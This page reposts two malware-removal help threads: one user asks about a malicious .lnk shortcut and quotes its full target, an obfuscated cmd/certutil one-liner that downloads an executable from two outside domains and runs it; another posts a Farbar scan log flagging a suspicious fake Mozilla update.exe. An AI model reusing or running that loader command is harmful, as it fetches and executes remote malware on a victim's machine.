Featured Post

.Lnk file with cmd usage - Virus, Trojan, Spyware, and Malware Removal Help - BleepingComputer

Image
.Lnk file with cmd usage - Virus, Trojan, Spyware, and Malware Removal Help - BleepingComputer.Lnk file with cmd usage - Virus, Trojan, Spyware, and Malware Removal Help - BleepingComputerPosted: 06 Jul 2020 11:33 AM PDT Hi all,Looking for feedback on the likelihood my double clicking of a bad .lnk file caused damage.. When I did double click it, I remember getting a standard windows dialog box. I believe it said the path did not exist or shortcut unavailable.. I'm not finding anything in my startup folder for C:\programdata or my username appdata startup folder...  I ran scans with malwarebytes, Hitman with no results.The .lnk file target was:%ComSpec% /v:on/c(SET V4=/?8ih5Oe0vii2dJ179aaaacabbckbdbhhe=gulches_%PROCESSOR_ARCHITECTURE% !H!&SET H="%USERNAME%.exe"&SET V4adKK47=certutil -urlcache -f https://&IF NOT EXIST !H! (!V4adKK47!izub.fun!V4!||!V4adKK47!de.charineziv.com!V4!&!H!))>nul 2>&1The .lnk file 'start-in' was:"%APPDATA%\Mic…

update.exe from mozilla probably fake - Virus, Trojan, Spyware, and Malware Removal Help - BleepingComputer

my pc freeze while I playing game so I did some google

got this thing every time I boot up my pc 

https://ibb.co/740dDLn

https://ibb.co/37LmQ31

https://ibb.co/qdsRM2w

I used FRST it's said that I need fixlist.txt ?

thank you in advance for your kindly support 

FRST LOG

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 11-04-2020
Ran by r_omi (administrator) on DESKTOP-D31LCR7 (Micro-Star International Co., Ltd MS-7C02) (12-04-2020 07:56:43)
Running from D:\Downloads
Loaded Profiles: r_omi (Available Profiles: r_omi)
Platform: Windows 10 Pro Version 1909 18363.752 (X64) Language: English (United States)
Default browser: Chrome
Boot Mode: Normal
==================== Processes (Whitelisted) =================
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
(Google LLC -> Google Inc.) C:\Program Files (x86)\Google\Chrome Remote Desktop\79.0.3945.10\remoting_host.exe
(Google LLC -> Google Inc.) C:\Program Files (x86)\Google\Chrome Remote Desktop\79.0.3945.10\remoting_host.exe
(Google LLC -> Google LLC) C:\Users\r_omi\AppData\Local\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Users\r_omi\AppData\Local\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Users\r_omi\AppData\Local\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Users\r_omi\AppData\Local\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Users\r_omi\AppData\Local\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Users\r_omi\AppData\Local\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Users\r_omi\AppData\Local\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Users\r_omi\AppData\Local\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Users\r_omi\AppData\Local\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Users\r_omi\AppData\Local\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Users\r_omi\AppData\Local\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Users\r_omi\AppData\Local\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Users\r_omi\AppData\Local\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Users\r_omi\AppData\Local\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Users\r_omi\AppData\Local\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Users\r_omi\AppData\Local\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Users\r_omi\AppData\Local\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Users\r_omi\AppData\Local\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Users\r_omi\AppData\Local\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Users\r_omi\AppData\Local\Google\Chrome\Application\chrome.exe
(Logitech -> Logitech Inc.) C:\Program Files\Logitech\Gaming Software\LWEMon.exe
(Logitech Inc -> Logitech, Inc.) C:\Program Files\LGHUB\lghub.exe
(Logitech Inc -> Logitech, Inc.) C:\Program Files\LGHUB\lghub.exe
(Logitech Inc -> Logitech, Inc.) C:\Program Files\LGHUB\lghub_agent.exe
(Logitech Inc -> Logitech, Inc.) C:\Program Files\LGHUB\lghub_updater.exe
(Microsoft Corporation) C:\Program Files\WindowsApps\Microsoft.WindowsStore_12004.1001.1.0_x64__8wekyb3d8bbwe\WinStore.App.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\rundll32.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\smartscreen.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\Taskmgr.exe
(Microsoft Windows Publisher -> Microsoft Corporation) C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2003.8-0\MsMpEng.exe
(Microsoft Windows Publisher -> Microsoft Corporation) C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2003.8-0\NisSrv.exe
(MICRO-STAR INTERNATIONAL CO., LTD. -> ) C:\Program Files (x86)\MSI Afterburner\MSIAfterburner.exe
(Mozilla Corporation -> Mozilla Corporation) C:\Program Files (x86)\Common Files\LaunchpadWeb\update.exe
(NVIDIA Corporation -> Node.js) C:\Program Files (x86)\NVIDIA Corporation\NvNode\NVIDIA Web Helper.exe
(NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe
(NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe
(NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe
(NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NVIDIA GeForce Experience\NVIDIA Share.exe
(NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NVIDIA GeForce Experience\NVIDIA Share.exe
(NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NVIDIA GeForce Experience\NVIDIA Share.exe
(NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\ShadowPlay\nvsphelper64.exe
(NVIDIA Corporation -> NVIDIA Corporation) C:\Windows\System32\DriverStore\FileRepository\nv_dispi.inf_amd64_e0a5a1b06de180e3\Display.NvContainer\NVDisplay.Container.exe
(NVIDIA Corporation -> NVIDIA Corporation) C:\Windows\System32\DriverStore\FileRepository\nv_dispi.inf_amd64_e0a5a1b06de180e3\Display.NvContainer\NVDisplay.Container.exe
(Oracle America, Inc. -> Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
(Realtek Semiconductor Corp. -> Realtek Semiconductor) C:\Windows\System32\RtkAudUService64.exe
(Realtek Semiconductor Corp. -> Realtek Semiconductor) C:\Windows\System32\RtkAudUService64.exe
(Thesycon Software Solutions GmbH & Co. KG) [File not signed] C:\Program Files\FiiO\FiiO_Driver\W10_x64\FiiOCplApp.exe
(Valve -> Valve Corporation) C:\Program Files (x86)\Common Files\Steam\SteamService.exe
(Valve -> Valve Corporation) D:\Program Files\Steam\bin\cef\cef.win7\steamwebhelper.exe
(Valve -> Valve Corporation) D:\Program Files\Steam\bin\cef\cef.win7\steamwebhelper.exe
(Valve -> Valve Corporation) D:\Program Files\Steam\bin\cef\cef.win7\steamwebhelper.exe
(Valve -> Valve Corporation) D:\Program Files\Steam\bin\cef\cef.win7\steamwebhelper.exe
(Valve -> Valve Corporation) D:\Program Files\Steam\bin\cef\cef.win7\steamwebhelper.exe
(Valve -> Valve Corporation) D:\Program Files\Steam\bin\cef\cef.win7\steamwebhelper.exe
(Valve -> Valve Corporation) D:\Program Files\Steam\bin\cef\cef.win7\steamwebhelper.exe
(Valve -> Valve Corporation) D:\Program Files\Steam\steam.exe
==================== Registry (Whitelisted) ===================
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
HKLM\...\Run: [RtkAudUService] => C:\Windows\System32\RtkAudUService64.exe [956920 2019-12-12] (Realtek Semiconductor Corp. -> Realtek Semiconductor)
HKLM\...\Run: [Start WingMan Profiler] => C:\Program Files\Logitech\Gaming Software\LWEMon.exe [190536 2010-06-14] (Logitech -> Logitech Inc.)
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [646160 2019-12-11] (Oracle America, Inc. -> Oracle Corporation)
HKU\S-1-5-21-173970672-666801694-2624729176-1001\...\Run: [Google Update] => C:\Users\r_omi\AppData\Local\Google\Update\1.3.35.452\GoogleUpdateCore.exe [217544 2020-03-21] (Google LLC -> Google LLC)
HKU\S-1-5-21-173970672-666801694-2624729176-1001\...\Run: [LGHUB] => C:\Program Files\LGHUB\lghub.exe [71464072 2020-04-03] (Logitech Inc -> Logitech, Inc.)
HKU\S-1-5-21-173970672-666801694-2624729176-1001\...\Run: [firefox] => C:\Program Files (x86)\Common Files\LaunchpadWeb\update.exe [910296 2010-03-31] (Mozilla Corporation -> Mozilla Corporation) <==== ATTENTION
HKU\S-1-5-21-173970672-666801694-2624729176-1001\...\Run: [Steam] => D:\Program Files\Steam\steam.exe [3371296 2020-04-04] (Valve -> Valve Corporation)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\FiiO Control Panel Autostart.lnk [2019-12-03]
ShortcutTarget: FiiO Control Panel Autostart.lnk -> C:\Program Files\FiiO\FiiO_Driver\W10_x64\FiiOCplApp.exe (Thesycon Software Solutions GmbH & Co. KG) [File not signed]
GroupPolicy: Restriction ? <==== ATTENTION
==================== Scheduled Tasks (Whitelisted) ============
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
Task: {069CF5C0-8104-4D3E-B4DA-2FD21E404F0F} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cleanup => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2003.8-0\MpCmdRun.exe [480272 2020-03-25] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {13373AB6-C29A-41C8-B3AA-6AB397953203} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2003.8-0\MpCmdRun.exe [480272 2020-03-25] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {135F4734-8A50-4809-B6CA-F5FC0F282B0B} - System32\Tasks\NvNodeLauncher_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\NvNode\nvnodejslauncher.exe [653848 2019-12-08] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {3F6549D4-6E0F-4308-95E0-D26500CC4310} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Verification => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2003.8-0\MpCmdRun.exe [480272 2020-03-25] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {626287BC-586E-41A4-8D45-7A328A8A0AD0} - System32\Tasks\NvDriverUpdateCheckDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [858480 2019-12-06] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {71773801-8623-4C23-A98E-BA0DB28E7FF2} - System32\Tasks\NvTmRep_CrashReport1_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvBackend\NvTmRep.exe [1134104 2019-12-08] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {80C6365E-DB46-4A1B-8EAA-7DEEE9641358} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2003.8-0\MpCmdRun.exe [480272 2020-03-25] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {97BEEF29-8E6A-4208-BC6E-DF2C9BCC03E8} - System32\Tasks\NvProfileUpdaterOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\Update Core\NvProfileUpdater64.exe [914456 2019-12-08] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {9BCD5B38-49F7-49E8-8A77-8353E4F9C4A4} - System32\Tasks\NvTmRep_CrashReport2_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvBackend\NvTmRep.exe [1134104 2019-12-08] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {A26BC672-C1DE-422D-8D0E-2DA5C4FCF020} - System32\Tasks\AMDAutoUpdate => C:\Program Files\AMD\AutoUpdate\AMDAutoUpdate.exe [677624 2019-11-21] (Advanced Micro Devices INC. -> )
Task: {A6F70817-3FCB-46D5-8967-B2D524DD0C97} - System32\Tasks\NvProfileUpdaterDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\Update Core\NvProfileUpdater64.exe [914456 2019-12-08] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {A7F07B37-516D-4567-99BE-AAAD715652EC} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-173970672-666801694-2624729176-1001UA => C:\Users\r_omi\AppData\Local\Google\Update\GoogleUpdate.exe [155432 2019-12-03] (Google Inc -> Google LLC)
Task: {B6E67F6F-DE8F-4740-964C-6EE6D86D8516} - System32\Tasks\NvTmRep_CrashReport4_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvBackend\NvTmRep.exe [1134104 2019-12-08] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {CA4EED07-06CF-4FD2-8965-A85890BAC4E0} - System32\Tasks\NvTmRep_CrashReport3_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvBackend\NvTmRep.exe [1134104 2019-12-08] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {D047C98A-2BA6-46FE-A551-E3E2105B49D9} - System32\Tasks\MSIAfterburner => C:\Program Files (x86)\MSI Afterburner\MSIAfterburner.exe [782320 2019-10-26] (MICRO-STAR INTERNATIONAL CO., LTD. -> )
Task: {E178A057-961C-4FB8-ACDE-93C0664C6D4F} - System32\Tasks\NvBatteryBoostCheckOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [858480 2019-12-06] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {EA032502-26F4-4E5C-9FD7-0A701A4C2EB2} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-173970672-666801694-2624729176-1001Core => C:\Users\r_omi\AppData\Local\Google\Update\GoogleUpdate.exe [155432 2019-12-03] (Google Inc -> Google LLC)
Task: {EB4407DD-56D0-49D3-AAA6-DE6ED5D7DBC0} - System32\Tasks\NVIDIA GeForce Experience SelfUpdate_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NVIDIA GeForce Experience\NVIDIA GeForce Experience.exe [3302880 2019-12-09] (NVIDIA Corporation -> NVIDIA Corporation)
(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)
==================== Internet (Whitelisted) ====================
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
Hosts: There are more than one entry in Hosts. See Hosts section of Addition.txt
Tcpip\Parameters: [DhcpNameServer] 115.178.58.26 115.178.58.10 192.168.1.1
Tcpip\..\Interfaces\{c11f8f76-9e3d-4fd7-bda0-b861e748b28e}: [DhcpNameServer] 115.178.58.26 115.178.58.10 192.168.1.1
Internet Explorer:
==================
BHO: IDM integration (IDMIEHlprObj Class) -> {0055C089-8582-441B-A0BF-17B458C2A3A8} -> D:\Program Files\Internet Download Manager\IDMIECC64.dll [2019-10-19] (Tonec Inc. -> Internet Download Manager, Tonec Inc.)
BHO: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files\Java\jre1.8.0_241\bin\ssv.dll [2020-03-09] (Oracle America, Inc. -> Oracle Corporation)
BHO: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files\Java\jre1.8.0_241\bin\jp2ssv.dll [2020-03-09] (Oracle America, Inc. -> Oracle Corporation)
BHO-x32: IDM integration (IDMIEHlprObj Class) -> {0055C089-8582-441B-A0BF-17B458C2A3A8} -> D:\Program Files\Internet Download Manager\IDMIECC.dll [2019-10-19] (Tonec Inc. -> Internet Download Manager, Tonec Inc.)
FF DefaultProfile: ru8jgfll.default
FF ProfilePath: C:\Users\r_omi\AppData\Roaming\Mozilla\Firefox\Profiles\ru8jgfll.default [2019-12-03]
FF ProfilePath: C:\Users\r_omi\AppData\Roaming\Mozilla\Firefox\Profiles\wtgd672l.default-release [2020-04-12]
FF Extension: (AdGuard AdBlocker) - C:\Users\r_omi\AppData\Roaming\Mozilla\Firefox\Profiles\wtgd672l.default-release\Extensions\adguardadblocker@adguard.com.xpi [2020-01-27]
FF ProfilePath: C:\Users\r_omi\AppData\Roaming\AMozilla\AFirefox\Profiles\d6zx2kke.default [2020-04-12] <==== ATTENTION
FF HKU\S-1-5-21-173970672-666801694-2624729176-1001\...\Firefox\Extensions: [mozilla_cc3@internetdownloadmanager.com] - D:\Program Files\Internet Download Manager\idmmzcc3.xpi
FF Extension: (IDM Integration Module) - D:\Program Files\Internet Download Manager\idmmzcc3.xpi [2019-09-20] [UpdateUrl:hxxps://data.internetdownloadmanager.com/idmmzcc3/update.json]
FF HKU\S-1-5-21-173970672-666801694-2624729176-1001\...\SeaMonkey\Extensions: [mozilla_cc@internetdownloadmanager.com] - C:\Users\r_omi\AppData\Roaming\IDM\idmmzcc5
FF Extension: (IDM CC) - C:\Users\r_omi\AppData\Roaming\IDM\idmmzcc5 [2019-12-04] [Legacy] [not signed]
FF HKU\S-1-5-21-173970672-666801694-2624729176-1001\...\SeaMonkey\Extensions: [mozilla_cc2@internetdownloadmanager.com] - D:\Program Files\Internet Download Manager\idmmzcc2.xpi
FF Extension: (IDM integration) - D:\Program Files\Internet Download Manager\idmmzcc2.xpi [2017-12-20] [Legacy]
FF Plugin: @java.com/DTPlugin,version=11.241.2 -> C:\Program Files\Java\jre1.8.0_241\bin\dtplugin\npDeployJava1.dll [2020-03-09] (Oracle America, Inc. -> Oracle Corporation)
FF Plugin: @java.com/JavaPlugin,version=11.241.2 -> C:\Program Files\Java\jre1.8.0_241\bin\plugin2\npjp2.dll [2020-03-09] (Oracle America, Inc. -> Oracle Corporation)
CHR Profile: C:\Users\r_omi\AppData\Local\Google\Chrome\User Data\Default [2020-04-12]
CHR HomePage: Default -> hxxp://www.google.com/ncr
CHR DefaultSearchURL: Default -> hxxps://ssl.gstatic.com/chromoting/chromoting_logo_512.png
CHR Extension: (Slides) - C:\Users\r_omi\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2019-12-03]
CHR Extension: (Docs) - C:\Users\r_omi\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2019-12-03]
CHR Extension: (Google Drive) - C:\Users\r_omi\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2019-12-03]
CHR Extension: (AdGuard AdBlocker) - C:\Users\r_omi\AppData\Local\Google\Chrome\User Data\Default\Extensions\bgnkhhnnamicmpeenaelnjfhikgbkllg [2020-03-26]
CHR Extension: (YouTube) - C:\Users\r_omi\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2019-12-03]
CHR Extension: (uBlock Origin) - C:\Users\r_omi\AppData\Local\Google\Chrome\User Data\Default\Extensions\cjpalhdlnbpafiamejdnhcphjbkeiagm [2020-02-06]
CHR Extension: (Chrome Remote Desktop) - C:\Users\r_omi\AppData\Local\Google\Chrome\User Data\Default\Extensions\efmjfjelnicpmdcmfikempdhlmainjcb [2020-02-19]
CHR Extension: (Sheets) - C:\Users\r_omi\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2019-12-03]
CHR Extension: (Chrome Remote Desktop) - C:\Users\r_omi\AppData\Local\Google\Chrome\User Data\Default\Extensions\gbchcmhmhahfdphkhkmpfmihenigjmpp [2019-12-26]
CHR Extension: (Google Docs Offline) - C:\Users\r_omi\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2020-03-11]
CHR Extension: (Chrome Remote Desktop) - C:\Users\r_omi\AppData\Local\Google\Chrome\User Data\Default\Extensions\inomeogfingihgjfjlpeplalcfajhgai [2019-12-26]
CHR Extension: (UltraWide Video) - C:\Users\r_omi\AppData\Local\Google\Chrome\User Data\Default\Extensions\lngfncacljheahfpahadgipefkbagpdl [2020-04-11]
CHR Extension: (Chrome Web Store Payments) - C:\Users\r_omi\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2019-12-03]
CHR Extension: (Gmail) - C:\Users\r_omi\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2019-12-03]
CHR Extension: (Chrome Media Router) - C:\Users\r_omi\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2020-04-03]
CHR HKLM\...\Chrome\Extension: [ngpampappnmepgilojfohadhhmbhlaek] - D:\Program Files\Internet Download Manager\IDMGCExt.crx [2019-11-16]
CHR HKLM-x32\...\Chrome\Extension: [ngpampappnmepgilojfohadhhmbhlaek] - D:\Program Files\Internet Download Manager\IDMGCExt.crx [2019-11-16]
==================== Services (Whitelisted) ===================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
S3 BEService; C:\Program Files (x86)\Common Files\BattlEye\BEService.exe [8567960 2020-04-04] (BattlEye Innovations e.K. -> )
R2 chromoting; C:\Program Files (x86)\Google\Chrome Remote Desktop\79.0.3945.10\remoting_host.exe [74392 2019-10-24] (Google LLC -> Google Inc.)
S3 EasyAntiCheat; C:\Program Files (x86)\EasyAntiCheat\EasyAntiCheat.exe [802432 2020-03-01] (EasyAntiCheat Oy -> EasyAntiCheat Ltd)
R2 LGHUBUpdaterService; C:\Program Files\LGHUB/lghub_updater.exe [10131080 2020-04-03] (Logitech Inc -> Logitech, Inc.)
R2 NvContainerLocalSystem; C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [858480 2019-12-06] (NVIDIA Corporation -> NVIDIA Corporation)
S3 NvContainerNetworkService; C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [858480 2019-12-06] (NVIDIA Corporation -> NVIDIA Corporation)
S3 Rockstar Service; C:\Program Files\Rockstar Games\Launcher\RockstarService.exe [1314448 2020-03-28] (Rockstar Games, Inc. -> Rockstar Games)
R2 RtkAudioUniversalService; C:\Windows\System32\RtkAudUService64.exe [956920 2019-12-12] (Realtek Semiconductor Corp. -> Realtek Semiconductor)
S3 Sense; C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe [5930136 2020-04-12] (Microsoft Windows Publisher -> Microsoft Corporation)
S3 uncheater_bgl; C:\Program Files\Common Files\Uncheater\uncheater_bgl.exe [2097008 2019-12-23] (Wellbia.com Co., Ltd. -> Wellbia.com Co., Ltd.)
R3 WdNisSvc; C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2003.8-0\NisSrv.exe [3294680 2020-03-25] (Microsoft Windows Publisher -> Microsoft Corporation)
R2 WinDefend; C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2003.8-0\MsMpEng.exe [103168 2020-03-25] (Microsoft Windows Publisher -> Microsoft Corporation)
R2 NVDisplay.ContainerLocalSystem; C:\Windows\System32\DriverStore\FileRepository\nv_dispi.inf_amd64_e0a5a1b06de180e3\Display.NvContainer\NVDisplay.Container.exe -s NVDisplay.ContainerLocalSystem -f %ProgramData%\NVDisplay.ContainerLocalSystem.log -l 3 -d C:\Windows\System32\DriverStore\FileRepository\nv_dispi.inf_amd64_e0a5a1b06de180e3\Display.NvContainer\plugins\LocalSystem -r -p 30000 -cfg NVDisplay.ContainerLocalSystem\LocalSystem
===================== Drivers (Whitelisted) ===================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
R3 amdgpio2; C:\Windows\System32\drivers\amdgpio2.sys [46040 2019-10-30] (Advanced Micro Devices INC. -> Advanced Micro Devices, Inc)
R3 amdgpio3; C:\Windows\System32\drivers\amdgpio3.sys [24528 2019-04-18] (AMD PMP-PE CB Code Signer v20160415 -> Advanced Micro Devices, Inc)
R3 AMDPCIDev; C:\Windows\System32\drivers\AMDPCIDev.sys [32520 2019-09-16] (Advanced Micro Devices INC. -> Advanced Micro Devices)
R0 amdpsp; C:\Windows\System32\drivers\amdpsp.sys [138064 2019-06-26] (Advanced Micro Devices, Inc. -> Advanced Micro Devices, Inc. )
R2 AMDRyzenMasterDriverV14; C:\Program Files\AMD\RyzenMaster\bin\AMDRyzenMasterDriver.sys [70432 2019-11-22] (Advanced Micro Devices INC. -> Advanced Micro Devices)
S3 BthA2dp; C:\Windows\System32\drivers\BthA2dp.sys [231936 2019-10-07] (Microsoft Corporation) [File not signed]
R3 fiio_usbaudio; C:\Windows\System32\drivers\fiio_usbaudio.sys [275104 2017-07-21] (Microsoft Windows Hardware Compatibility Publisher -> Thesycon Software Solutions GmbH & Co. KG)
R3 fiio_usbaudioks; C:\Windows\System32\drivers\fiio_usbaudioks.sys [52896 2017-07-21] (Microsoft Windows Hardware Compatibility Publisher -> Thesycon Software Solutions GmbH & Co. KG)
R2 LGHUBTemperatureService; C:\ProgramData\LGHUB\depots\47127\driver_cpu_temperature\logi_core_temp.sys [25448 2020-04-03] (Logitech Inc. -> Logitech)
R3 logi_joy_bus_enum; C:\Windows\system32\drivers\logi_joy_bus_enum.sys [38136 2019-12-03] (Logitech Inc -> Logitech)
R3 logi_joy_vir_hid; C:\Windows\system32\drivers\logi_joy_vir_hid.sys [20624 2019-12-03] (WDKTestCert sqa,131523902232810150 -> Logitech, Inc.)
R3 logi_joy_xlcore; C:\Windows\system32\drivers\logi_joy_xlcore.sys [66808 2019-12-03] (Logitech Inc -> Logitech)
R3 nvlddmkm; C:\Windows\System32\DriverStore\FileRepository\nv_dispi.inf_amd64_e0a5a1b06de180e3\nvlddmkm.sys [23439288 2020-03-19] (NVIDIA Corporation -> NVIDIA Corporation)
S3 NvStreamKms; C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamKms.sys [30336 2019-12-07] (NVIDIA Corporation -> NVIDIA Corporation)
R3 nvvad_WaveExtensible; C:\Windows\system32\drivers\nvvad64v.sys [69840 2019-11-21] (NVIDIA Corporation -> NVIDIA Corporation)
R3 nvvhci; C:\Windows\System32\drivers\nvvhci.sys [75600 2019-11-21] (NVIDIA Corporation -> NVIDIA Corporation)
R3 rt640x64; C:\Windows\System32\drivers\rt640x64.sys [1154336 2019-06-19] (Realtek Semiconductor Corp. -> Realtek )
R3 RTCore64; C:\Program Files (x86)\MSI Afterburner\RTCore64.sys [24000 2019-09-26] (MICRO-STAR INTERNATIONAL CO., LTD. -> )
R2 SSGDIO; C:\Windows\SysWOW64\DRIVERS\ssgdio64.sys [14608 2019-12-04] (ATI Technologies, Inc -> ATI Technologies Inc.)
S0 WdBoot; C:\Windows\System32\drivers\wd\WdBoot.sys [45960 2020-03-25] (Microsoft Windows Early Launch Anti-malware Publisher -> Microsoft Corporation)
R0 WdFilter; C:\Windows\System32\drivers\wd\WdFilter.sys [391392 2020-03-25] (Microsoft Windows -> Microsoft Corporation)
R3 WdNisDrv; C:\Windows\System32\drivers\wd\WdNisDrv.sys [59104 2020-03-25] (Microsoft Windows -> Microsoft Corporation)
S3 xhunter1; C:\Windows\xhunter1.sys [74552 2020-02-17] (Wellbia.com Co., Ltd. -> Wellbia.com Co., Ltd.)
==================== NetSvcs (Whitelisted) ===================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
==================== One month (created) ===================
(If an entry is included in the fixlist, the file/folder will be moved.)
2020-04-12 07:55 - 2020-04-12 07:56 - 000000000 ____D C:\FRST
2020-04-12 07:45 - 2020-04-12 07:45 - 000000000 ____D C:\Users\r_omi\AppData\Roaming\Process Hacker 2
2020-04-12 07:40 - 2020-04-12 07:40 - 000036192 _____ (Sysinternals - www.sysinternals.com) C:\Windows\system32\Drivers\PROCEXP152.SYS
2020-04-12 07:29 - 2020-04-12 07:29 - 000007604 _____ C:\Users\r_omi\AppData\Local\Resmon.ResmonCfg
2020-04-12 07:22 - 2020-04-12 07:22 - 000001108 _____ C:\Users\r_omi\Desktop\Resource Monitor.lnk
2020-04-12 06:58 - 2020-04-12 06:58 - 000000080 ___SH C:\bootTel.dat
2020-04-12 05:49 - 2020-04-12 05:49 - 025444352 _____ (Microsoft Corporation) C:\Windows\system32\Hydrogen.dll
2020-04-12 05:49 - 2020-04-12 05:49 - 022636544 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll
